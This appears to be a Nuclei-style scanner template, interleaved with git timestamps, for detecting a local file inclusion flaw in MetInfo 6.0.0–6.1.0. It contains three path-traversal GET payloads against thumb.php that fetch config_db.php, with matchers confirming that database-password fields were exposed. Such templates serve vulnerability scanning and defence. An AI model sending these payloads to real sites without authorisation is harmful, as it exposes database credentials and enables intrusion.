2021-02-20 00:25:43 +00:00
id : metinfo-lfi
2022-04-22 10:38:41 +00:00
2021-02-20 00:25:43 +00:00
info :
2022-07-27 20:17:31 +00:00
name : MetInfo <=6.1.0 - Local File Inclusion
2021-02-20 00:25:43 +00:00
author : pikpikcu
severity : high
2022-07-27 20:17:31 +00:00
description : MetInfo 6.0.0 through 6.1.0 is vulnerable to local file inclusion and allows remote unauthenticated attackers access to locally stored files and their content.
2022-04-22 10:38:41 +00:00
reference :
- https://paper.seebug.org/676/
2022-07-27 20:17:31 +00:00
classification :
cvss-metrics : CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score : 7.5
cwe-id : CWE-22
2021-02-20 13:54:20 +00:00
tags : metinfo,lfi
2021-02-20 00:25:43 +00:00
requests :
- method : GET
path :
- '{{BaseURL}}/include/thumb.php?dir=http/.....///.....///config/config_db.php'
- '{{BaseURL}}/include/thumb.php?dir=.....///http/.....///config/config_db.php'
- '{{BaseURL}}/include/thumb.php?dir=http\\..\\..\\config\\config_db.php'
2021-10-02 12:27:33 +00:00
2021-10-02 06:42:22 +00:00
stop-at-first-match : true
2021-02-20 00:25:43 +00:00
matchers-condition : and
matchers :
2021-10-02 12:27:33 +00:00
2021-02-20 00:25:43 +00:00
- type : word
words :
- "con_db_pass"
- "con_db_name"
part : body
condition : and
2021-10-02 12:27:59 +00:00
2021-02-20 00:25:43 +00:00
- type : status
status :
- 200
2022-07-27 20:17:31 +00:00
# Enhanced by mp on 2022/07/27